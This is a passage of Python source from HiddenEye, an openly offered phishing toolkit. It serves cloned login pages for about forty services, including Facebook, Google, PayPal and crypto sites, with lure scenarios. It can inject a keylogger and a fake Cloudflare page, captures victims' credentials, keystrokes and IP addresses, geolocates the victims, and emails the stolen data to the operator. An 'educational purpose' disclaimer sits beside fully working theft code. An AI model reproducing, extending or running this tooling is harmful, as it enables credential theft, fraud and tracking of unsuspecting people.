{0}[{1}17{0}]{1} Netflix {0}[{1}29{0}]{1} eBay ".format( MAIN0, MAIN2)) print(" {0}[{1}06{0}]{1} WordPress {0}[{1}18{0}]{1} Origin {0}[{1}30{0}]{1} MySpace ".format( MAIN0, MAIN2)) print(" {0}[{1}07{0}]{1} Twitter {0}[{1}19{0}]{1} Pinterest {0}[{1}31{0}]{1} PayPal ".format( MAIN0, MAIN2)) print(" {0}[{1}08{0}]{1} Instagram {0}[{1}20{0}]{1} ProtonMail {0}[{1}32{0}]{1} Shopify".format( MAIN0, MAIN2)) print(" {0}[{1}09{0}]{1} Snapchat {0}[{1}21{0}]{1} Spotify {0}[{1}33{0}]{1} Verizon ".format( MAIN0, MAIN2)) print(" {0}[{1}10{0}]{1} Yahoo {0}[{1}22{0}]{1} Quora {0}[{1}34{0}]{1} Yandex ".format( MAIN0, MAIN2)) print(" {0}[{1}11{0}]{1} Twitch {0}[{1}23{0}]{1} PornHub {0}[{1}35{0}]{1} Reddit ".format( MAIN0, MAIN2)) print(" {0}[{1}12{0}]{1} Microsoft {0}[{1}24{0}]{1} Adobe {0}[{1}36{0}]{1} Subito.it ".format( MAIN0, MAIN2)) option = input("{0}HiddenEye >>> {1}".format(MAIN0, MAIN2)) if option == '1' or option == '01': loadModule('Facebook') customOption = input("\nOperation mode:\n {0}[{1}1{0}]{1} Standard Page Phishing\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n{0}HiddenEye >>> {2}".format(MAIN0, MAIN2, MAIN2)) runPhishing('Facebook', customOption) elif option == '2' or option == '02': loadModule('Google') customOption = input( "\nOperation mode:\n {0}[{1}1{0}]{1} Standard Page Phishing\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n {0}[{1}3{0}]{1} New Google Web\n{0}HiddenEye >>> {2}".format(MAIN0, MAIN2, MAIN2)) runPhishing('Google', customOption) elif option == '3' or option == '03': loadModule('LinkedIn') customOption = '' runPhishing('LinkedIn', customOption) elif option == '4' or option == '04': loadModule('GitHub') customOption = '' runPhishing('GitHub', customOption) elif option == '5' or option == '05': loadModule('StackOverflow') customOption = '' runPhishing('StackOverflow', customOption) elif option == '6' or option == '06': loadModule('WordPress') customOption = '' runPhishing('WordPress', customOption) elif option == '7' or option == '07': loadModule('Twitter') customOption = '' runPhishing('Twitter', customOption) elif option == '8' or option == '08': loadModule('Instagram') customOption = input("\nOperation mode:\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (To Lure The Users)\n {0}[{1}3{0}]{1} Instagram Advanced Scenario (Appears as Instagram Profile)\n {0}[{1}4{0}]{1} Instagram Verified Badge Attack (Lure To Get Blue Badge){1} *[NEW]*\n {0}[{1}5{0}]{1} Instafollower (Lure To Get More Followers){1} *[NEW]*\n{0}HiddenEye >>> {2}".format(MAIN0, MAIN2, MAIN2)) runPhishing('Instagram', customOption) elif option == '9' or option == '09': loadModule('Snapchat') customOption = '' runPhishing('Snapchat', customOption) elif option == '10': loadModule('Yahoo') customOption = '' runPhishing('Yahoo', customOption) elif option == '11': loadModule('Twitch') customOption = '' runPhishing('Twitch', customOption) elif option == '12': loadModule('Microsoft') customOption = '' runPhishing('Microsoft', customOption) elif option == '13': loadModule('Steam') customOption = '' runPhishing('Steam', customOption) elif option == '14': loadModule('VK') customOption = input( "\nOperation mode:\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n{0}HiddenEye >>> {2}".format(MAIN0, MAIN4, MAIN2)) runPhishing('VK', customOption) elif option == '15': loadModule('iCloud') customOption = '' runPhishing('iCloud', customOption) elif option == '16': loadModule('GitLab') customOption = '' runPhishing('GitLab', customOption) elif option == '17': loadModule('NetFlix') customOption = '' runPhishing('NetFlix', customOption) elif option == '18': loadModule('Origin') customOption = '' runPhishing('Origin', customOption) elif option == '19': loadModule('Pinterest') customOption = '' runPhishing('Pinterest', customOption) elif option == '20': loadModule('ProtonMail') customOption = '' runPhishing('ProtonMail', customOption) elif option == '21': loadModule('Spotify') customOption = '' runPhishing('Spotify', customOption) elif option == '22': loadModule('Quora') customOption = '' runPhishing('Quora', customOption) elif option == '23': loadModule('PornHub') customOption = '' runPhishing('PornHub', customOption) elif option == '24': loadModule('Adobe') customOption = '' runPhishing('Adobe', customOption) elif option == '25': loadModule('Badoo') customOption = '' runPhishing('Badoo', customOption) elif option == '26': loadModule('CryptoCurrency') customOption = '' runPhishing('CryptoCurrency', customOption) elif option == '27': loadModule('DevianArt') customOption = '' runPhishing('DevianArt', customOption) elif option == '28': loadModule('DropBox') customOption = '' runPhishing('DropBox', customOption) elif option == '29': loadModule('eBay') customOption = '' runPhishing('eBay', customOption) elif option == '30': loadModule('MySpace') customOption = '' runPhishing('Myspace', customOption) elif option == '31': loadModule('PayPal') customOption = '' runPhishing('PayPal', customOption) elif option == '32': loadModule('Shopify') customOption = '' runPhishing('Shopify', customOption) elif option == '33': loadModule('Verizon') customOption = '' runPhishing('Verizon', customOption) elif option == '34': loadModule('Yandex') customOption = '' runPhishing('Yandex', customOption) elif option == '35': loadModule('Reddit') customOption = input( "\nOperation mode:\n {0}[{1}1{0}]{1} New reddit page\n {0}[{1}2{0}]{1} Old reddit page\n{0}HiddenEye >>> {2}".format(MAIN0, MAIN2, MAIN2)) runPhishing('Reddit', customOption) elif option == '36': loadModule('Subitoit') customOption = '' runPhishing('Subitoit', customOption) elif option == '37': loadModule('PlayStation') customOption = '' runPhishing('PlayStation', customOption) elif option == '38': loadModule('Xbox') customOption = '' runPhishing('Xbox', customOption) elif option == '39': loadModule('CUSTOM(1)') customOption = '' runPhishing('CUSTOM(1)', customOption) elif option == '40': loadModule('CUSTOM(2)') customOption = '' runPhishing('CUSTOM(2)', customOption) else: endMessage(port) def loadModule(module): # This one just show text.. print(''' {0} [{1}*{0}] SELECT ANY ONE MODE...{0}\n--------------------------------'''.format(MAIN0, MAIN2)) def inputCustom(): # Question where user can input custom web-link system('clear') print('''{1} _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ PUT YOUR REDIRECTING URL HERE ] {0}\n-------------------------------'''.format(MAIN0, MAIN2)) print( '''\n{1}**{0}(Do not leave it blank. Unless Errors may occur)'''.format(MAIN2, MAIN4)) print( '''\n{0}[{1}*{0}]{0}Insert a custom redirect url:'''.format(MAIN0, MAIN4)) custom = input('''\n{0}REDIRECT HERE>>> {2}'''.format(MAIN0, MAIN4, MAIN2)) if 'http://' in custom or 'https://' in custom: pass else: custom = 'http://' + custom if path.exists('Server/www/post.php') and path.exists('Server/www/login.php'): with open('Server/www/login.php') as f: read_data = f.read() c = read_data.replace('', custom) f = open('Server/www/login.php', 'w') f.write(c) f.close() with open('Server/www/post.php') as f: read_data = f.read() c = read_data.replace('', custom) f = open('Server/www/post.php', 'w') f.write(c) f.close() else: with open('Server/www/login.php') as f: read_data = f.read() c = read_data.replace('', custom) f = open('Server/www/login.php', 'w') f.write(c) f.close() def emailPrompt(): system('clear') print('''{1} _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {1}http://github.com/darksecdevelopers {0}** BY: {1}DARKSEC {0}** '''.format(MAIN0, MAIN2)) print( "-------------------------------\n{0}[ PROMPT: NEED CAPTURED DATA TO EMAIL ? ]{1}!! {0}\n-------------------------------".format(MAIN0, MAIN4)) addingEmail() def addingEmail(): print("\n{0}[{1}!{0}]{1}No Need To Configure, If you have Already Done. ".format( MAIN0, MAIN4)) print("\n{0}[{1}*{0}]{0}DO YOU WANT CAPTURED DATA TO BE EMAILED, THEN CREATE CONFIG FILE -{1}(Y/N)".format(MAIN0, MAIN4)) choice = input("\n\n{1}{0}YOUR CHOICE >>> {2}".format( MAIN0, MAIN4, MAIN2)).upper() if choice == 'Y': print("\n{0}[{1}!{0}] BEFORE STARTING MAKE SURE THESE THINGS: \n\n{0}[{1}+{0}] {1}YOU HAVE CORRECT GMAIL USERNAME & PASSWORD\n{0}[{1}+{0}] {1}YOU HAVE DISABLED 2-FACTOR AUTHENTICATION FROM YOUR GMAIL ACCOUNT\n{0}[{1}+{0}] {1}YOU HAVE TURNED ON LESS SECURED APPS \n (https://myaccount.google.com/lesssecureapps) \n\n".format(MAIN0, MAIN4)) input('[.] Press Enter To Start Configuring Gmail Credential File...') emailPrompt2() elif choice == 'N': pass else: print('[^] ERROR: Please choose correct option to continue...') sleep(1) emailPrompt() def emailPrompt2(): system('clear') print('''{1} _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {1}http://github.com/darksecdevelopers {0}** BY: {1}DARKSEC {0}** '''.format(MAIN0, MAIN2)) print( "-------------------------------\n{0}[ PROMPT: CONFIG EMAIL CREDENTIAL FILE ]{1}!! {0}\n-------------------------------".format(MAIN0, MAIN4)) emailConfig() def emailConfig(): system('cp Defs/Send_Email/EmailConfigDefault.py Defs/Send_Email/emailconfig.py') GMAILACCOUNT = input( "{0}[{1}+{0}]{0} Enter Your Gmail Username:{1} ".format(MAIN0, MAIN4)) with open('Defs/Send_Email/emailconfig.py') as f: read_data = f.read() c = read_data.replace('GMAILACCOUNT', GMAILACCOUNT) f = open('Defs/Send_Email/emailconfig.py', 'w') f.write(c) f.close() print("{0}[.] {1}Email Address Added To config File. !\n".format( MAIN0, MAIN4)) GMAILPASSWORD = getpass.getpass( "{0}[{1}+{0}]{0} Enter Your Gmail Password:{1} ".format(MAIN0, MAIN4)) with open('Defs/Send_Email/emailconfig.py') as f: read_data = f.read() GMAILPASSWORD = base64.b64encode(GMAILPASSWORD.encode()) GMAILPASSWORD = (GMAILPASSWORD.decode('utf-8')) c = read_data.replace('GMAILPASSWORD', GMAILPASSWORD) f = open('Defs/Send_Email/emailconfig.py', 'w') f.write(c) f.close() print("{0}[.] {1}Password(Encoded) Added To config File. !\n".format( MAIN0, MAIN4)) RECIPIENTEMAIL = input( "{0}[{1}+{0}]{0} Enter Recipient Email:{1} ".format(MAIN0, MAIN4)) with open('Defs/Send_Email/emailconfig.py') as f: read_data = f.read() c = read_data.replace('RECIPIENTEMAIL', RECIPIENTEMAIL) f = open('Defs/Send_Email/emailconfig.py', 'w') f.write(c) f.close() print("{0}[.] {1}Recipient Email Address Added To config File. !\n".format( MAIN0, MAIN4)) print( '\n\n{0}[{1}SUCCESS{0}]{0}: Created Config File & Saved To (Defs/Send_Email/Config.py)'.format(MAIN0, MAIN4)) def cloudfarePrompt(): system('clear') print('''{1} _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {1}http://github.com/darksecdevelopers {0}** BY: {1}DARKSEC {0}** '''.format(MAIN0, MAIN2)) print( "-------------------------------\n{0}[ CLOUDFARE PROTECTION PROMPT ]{1}!! {0}\n-------------------------------".format(MAIN0, MAIN4)) addingCloudfare() def addingCloudfare(): print("\n{0}[{1}*{0}]{0}DO YOU WANT TO ADD A CLOUDFARE PROTECTION FAKE PAGE -{1}(Y/N)".format(MAIN0, MAIN4)) choice = input("\n\n{1}{0}YOUR CHOICE >>> {2}".format( MAIN0, MAIN4, MAIN2)).upper() if choice == 'Y': addCloudfare() else: sleep(1) def addCloudfare(): system('mv Server/www/index.* Server/www/home.php && cp WebPages/cloudfare.html Server/www/index.html') print("\n{0}[{1}#{0}]CLOUDFARE FAKE PAGE{0} ADDED...".format(MAIN0, MAIN4)) sleep(1) def keyloggerprompt(): system('clear') print('''{1} _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {1}http://github.com/darksecdevelopers {0}** BY: {1}DARKSEC {0}** '''.format(MAIN0, MAIN2)) print( "-------------------------------\n{0}[ KEYLOGGER PROMPT ]{1}!! {0}\n-------------------------------".format(MAIN0, MAIN4)) def addingkeylogger(): print("\n{0}[{1}!{0}]{1}ATTENTION: Adding Keylogger Mostly Kills the Tunnel Connection.\n".format( MAIN0, MAIN4)) print("\n{0}[{1}*{0}]{0}DO YOU WANT TO ADD A KEYLOGGER IN PHISHING PAGE-{1}(Y/N)".format(MAIN0, MAIN4)) choice = input("\n\n{1}{0}YOUR CHOICE >>> {2}".format( MAIN0, MAIN4, MAIN2)).upper() if choice == 'Y': addkeylogger() else: sleep(1) def addkeylogger(): if path.exists('Server/www/index.html'): with open('Server/www/index.html') as f: read_data = f.read() c = read_data.replace( '', '') f = open('Server/www/index.html', 'w') f.write(c) f.close() print("\n{0}[{1}#{0}]Keylgger{0} ADDED !!!".format(MAIN0, MAIN4)) sleep(2) else: with open('Server/www/index.php') as f: read_data = f.read() c = read_data.replace( '', '') f = open('Server/www/index.php', 'w') f.write(c) f.close() print("\n{0}[{1}#{0}]Keylgger{0} ADDED !!!".format(MAIN0, MAIN4)) sleep(2) def runServer(port): system("fuser -k %s/tcp > /dev/null 2>&1" % (port)) system("cd Server/www/ && php -S > /dev/null 2>&1 &" % (port)) def emailPrompt3(port): # Ask user to start sending credentials to recipient Email Address. choice = input( "\n\n{0}[{1}?{0}] Send Captured Data To Recipient Email Address.\nSend_Email(y/n)>> {2}".format(MAIN0, MAIN4, MAIN2)).upper() if choice == 'Y' or choice == 'y': if path.isfile('Defs/Send_Email/emailconfig.py') == True: system('python3 Defs/Send_Email/SendEmail.py') else: print( '[ERROR!]: NO CONFIG FILE FOUND ! PLEASE CREATE CONFIG FILE FIRST TO USE THIS OPTION.') sleep(2) endMessage(port) elif choice == 'N' or choice == 'n': endMessage(port) else: system('clear') print("\n\n{0}[{1}^{0}] {2}Please Select A Valid Option.. ".format( MAIN0, MAIN4, MAIN2)) sleep(1) system('clear') return emailPrompt3(port) def endMessage(port): # Message when HiddenEye exit choice = input( "\n\n{0}[{1}?{0}] Re-run(r) : Exit(x) : Send Email(M) : SelectServer(S)\n\n >> {2}".format(MAIN0, MAIN4, MAIN2)).upper() if choice == 'R' or choice == 'r': system('sudo python3 HiddenEye.py') elif choice == 'M' or choice == 'm': emailPrompt3(port) elif choice == 'S' or choice == 's': returnServer(port) elif choice == 'X' or choice == 'x': system('clear') print(''' {3}HIDDEN EYE {3}BY: DARKSEC TEAM {1}https://github.com/DarkSecDevelopers/HiddenEye {3} [[*]] IF YOU LIKE THIS TOOL, THEN PLEASE HELP TO BECOME BETTER. {0} [{3}!{0}] PLEASE LET US KNOW , IF ANY PHISHING PAGE GOT BROKEN . [{3}!{0}] MAKE PULL REQUEST, LET US KNOW YOU SUPPORT US. [{3}!{0}] IF YOU HAVE MORE PHISHING PAGES, THEN JUST MAKE A PULL REQUEST. [{3}!{0}] PLEASE DON'T HARM ANYONE , ITS ONLY FOR EDUCATIONAL PURPOSE. [{3}!{0}] WE WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS TOOL {3} [[*]] THANKS FOR USE THIS TOOL. HAPPY HACKING ... GOOD BYE \n '''.format(MAIN2, MAIN2, MAIN4, MAIN0)) else: system('clear') return endMessage(port) def returnServer(port): selectServer(port) def getCredentials(port): print("{0}[{1}*{0}]{1} Waiting For Victim Interaction. Keep Eyes On Requests Coming From Victim ... \n{2}________________________________________________________________________________\n".format(MAIN0, MAIN2, MAIN4)) while True: with open('Server/www/usernames.txt') as creds: lines = creds.read().rstrip() if len(lines) != 0: writeLog('\n {0}[{1} CREDENTIALS FOUND {0}]{1}:\n {0}{2}{1}'.format( MAIN2, MAIN3, lines)) system("touch Server/CapturedData/usernames.txt && cat Server/www/usernames.txt >> Server/CapturedData/usernames.txt && cp Server/CapturedData/usernames.txt Defs/Send_Email/attachments/usernames.txt && echo -n '' > Server/www/usernames.txt") with open('Server/www/ip.txt') as creds: lines = creds.read().rstrip() if len(lines) != 0: ip = re.search("Victim Public IP: (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[\n,\r]", lines).group(1) user = re.match('Current logged in user: (a-z0-9)\n', lines) resp = urlopen('https://ipinfo.io/{0}/json'.format(ip)) ipinfo = json.loads(resp.read().decode( resp.info().get_param('charset') or 'utf-8')) if 'bogon' in ipinfo: print(' \n\n{0}[ VICTIM IP BONUS ]{1}:\n {0}{2}{1}'.format( MAIN0, MAIN2, lines)) else: matchObj = re.match('^(.*?),(.*)$', ipinfo['loc']) latitude = matchObj.group(1) longitude = matchObj.group(2) writeLog(' \n\n{0}[ VICTIM INFO FOUND ]{1}:\n{0}{2}{1}'.format( MAIN3, MAIN2, lines)) writeLog(' \n{0}Longitude: {2} \nLatitude: {3}{1}'.format( MAIN3, MAIN2, longitude, latitude)) writeLog(' \n{0}ISP: {2} \nCountry: {3}{1}'.format( MAIN3, MAIN2, ipinfo['org'], ipinfo['country'])) writeLog(' \n{0}Region: {2} \nCity: {3}{1}'.format( MAIN3, MAIN2, ipinfo['region'], ipinfo['city'])) system('touch Server/CapturedData/ip.txt && cat Server/www/ip.txt >> Server/CapturedData/ip.txt && cp Server/CapturedData/ip.txt Defs/Send_Email/attachments/ip.txt && rm -rf Server/www/ip.txt && touch Server/www/ip.txt') creds.close() with open('Server/www/KeyloggerData.txt') as creds: lines = creds.read().rstrip() if len(lines) != 0: writeLog( '{0}...............................'.format(MAIN0, MAIN4)) writeLog( ' {1}[{0} GETTING PRESSED KEYS {1}]{1}:\n {0}{2}{1}'.format(MAIN3, MAIN2, lines)) system('touch Server/CapturedData/KeyloggerData.txt && cat Server/www/KeyloggerData.txt >> Server/CapturedData/KeyloggerData.txt && cp Server/CapturedData/KeyloggerData.txt Defs/Send_Email/attachments/KeyloggerData.txt && rm -rf Server/www/KeyloggerData.txt && touch Server/www/KeyloggerData.txt') writeLog( '{0}...............................'.format(MAIN0, MAIN4)) creds.close() def writeLog(ctx): # Writing log if config.get("Settings", "DidBackground") == "True": # if didBackground == True, write logFile.write(ctx.replace(MAIN0, "").replace(MAIN1, "").replace( MAIN2, "").replace(MAIN3, "").replace(MAIN4, "") + "\n") print(ctx)